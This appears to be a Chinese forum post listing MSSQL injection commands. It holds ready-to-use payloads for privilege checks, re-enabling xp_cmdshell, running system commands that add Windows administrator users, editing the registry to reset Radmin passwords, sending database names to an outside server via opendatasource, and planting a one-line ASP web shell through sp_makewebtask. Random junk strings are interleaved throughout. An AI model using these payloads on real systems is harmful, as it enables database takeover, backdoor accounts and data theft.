阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
/ K+ H7 L# p" Y! }) m8 y4 w//看看是什么权限的
6 J+ r2 |; H1 Z# D: j  Q2 Land 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

+ k6 p+ E  ~: o" I8 B/ d% x/ k) i- L//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
9 E9 P) T9 e; w8 T+ h
% l- y9 E* a4 O
数字类型
( ~7 G$ C1 s0 @4 K. f  M4 vand char(124)%2Buser%2Bchar(124)=0

& I6 c) \7 t" l4 E字符类型
3 i; K+ P) R( ^6 J! ^% V8 @/ v' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
$ U; D: f7 t* i5 W1 I! b+ F  J+ o' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
  i; p% }6 H. Z" C7 G# T- a/ nand user>0
% b# H% s2 C; h7 q' and user>0 and ''='

5 n9 T9 w! b4 S2 ]2 b检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
0 v' z8 g& P/ x. }& |) K" xAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
# G* z8 @  x0 H5 ~5 w  h. l: R
检测是不是MSSQL数据库
and exists (select * from sysobjects);--
2 J: W( k* [0 a3 ^: K
+ a  W) v; n! g8 r( g: B检测是否支持多行
6 j. N0 z5 T/ g1 r& k) \;declare @d int;--

恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
7 b3 W+ M& n! @9 `0 \
2 ^" `3 [0 |3 a9 R
  \. D  W; S) jselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
3 V8 O* _+ V3 Q, o  [6 j$ D& B! ~
5 ^0 f8 R% f( i. M  {9 u/ _//-----------------------
  b9 v5 w1 i$ d4 y2 m# r//      执行命令
3 m7 P: n. F$ w6 o: K; j5 P//-----------------------
: P- t$ `% O0 w# o首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
) l2 p' O* z! ~, {. w( ]
9 b* j1 j; n; B9 ?* v3 j然后利用jet.oledb执行系统命令
/ ~  @8 D+ O4 aselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
2 O8 @/ c3 Z" [4 ^
执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

% ^: x8 k$ n9 R! e0 m; oEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
; r# _) j' K" ~
4 E8 Q" @& N& x6 `  \判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

5 k. S; ^8 I: g, Q8 A) }REG_SZ
+ K8 n3 N$ ?+ ~
/ y( e: Q* I& \8 B% U读注册表
$ d, e) z+ Q4 C1 r) K( u2 b1 fexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

0 `$ Y. j: ~* f2 N* g( h读取目录内容
. H7 p3 V5 U- w6 f2 nexec master..xp_dirtree 'c:\winnt\system32\',1,1
* }+ y9 G7 D1 a5 z
# U3 _3 K) y/ k. Y; T" `* z  u
数据库备份
backup database pubs to disk = 'c:\123.bak'
* F/ V) P0 J" f
//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

' I  P5 R1 H9 V. k# x+ _

更改sa口令方法：用sql综合利用工具连接后，执行命令：
" ]5 a0 a7 s8 u4 `) R# \& Jexec sp_password NULL,'新密码','sa'
& L% v% D- }: Z% h5 u9 Z. ~& f
; a, t( n+ b( S6 ^1 U添加和删除一个SA权限的用户test：
) s3 {  d3 G6 K1 M2 e+ O- Qexec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
4 A* b9 h; X8 u5 _$ K5 e% ?. N
删除扩展存储过过程xp_cmdshell的语句:
9 c9 l3 [+ ^- t; e6 ~7 _$ x+ bexec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程
6 }% o7 q9 c2 E  u9 ]. i5 j% Y5 SEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
! p: l  u5 k$ ]
( ?1 v* h0 ^7 r  C- a
: N) P- k( p8 Y+ R/ ~- `4 l停掉或激活某个服务。
/ h1 m* f+ ]/ E$ z& _0 p$ ]( l
* d& l: S" [% A7 bexec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

6 F" s2 l" S) m9 cdbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

. K  Y. H" G4 ldbo.xp_makecab
; ~: A+ g! i9 l) v
( L7 F: c- O  U9 M* \, G/ \& Z8 n将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
' X% ~" R# [+ S+ x
dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
+ z! _* r0 X0 v5 Q5 ?'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

! J# t4 |6 X" d: n停掉某个执行中的程序，但赋予的参数是 Process ID。
0 w9 d8 G/ F6 y' T0 ?利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
$ ]8 |8 z5 V- w6 A' q
xp_terminate_process 2484

& R# W) F+ V+ a7 p! w8 C# T* w: J( Nxp_unpackcab
! h# m8 C/ ~, t* k# v: Q( Q  N
/ T) i* u1 P& }; y/ r解开压缩档。

$ Q* \6 E0 g8 i( w* uxp_unpackcab 'c:\test.cab','c:\temp',1
: E' O) f6 f- B4 e

某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

create database lcx;
, D  R' D; M! h7 S, M. ZCreate TABLE ku(name nvarchar(256) null);
4 j: f+ s% A8 @5 q: ]Create TABLE biao(id int NULL,name nvarchar(256) null);
4 j( `9 E9 v3 a! X8 m' a6 `! D
. i: t% R1 t( s& t9 b& s//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

! @8 `. E& a" M
( }. `0 E( f/ i//在Master中创建表，看看权限怎样
  q1 n$ ~: G- nCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

' Z# d) {, D0 _6 a( E1 w" k用 sp_makewebtask直接在web目录里写入一句话马：
0 k! u6 J' x- b# s$ r( R& l% ^http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
* U) M, }8 Z7 T1 v- Y7 I9 M9 f
/ a* Q" ?9 h; ~* C, h//更新表内容
Update films SET kind = 'Dramatic' Where id = 123
2 T# h- ~9 O4 G5 z( P
8 m% d7 K% J, J3 O; [//删除内容
& C! ]8 c7 D3 O* \' k; udelete from table_name where Stockid = 3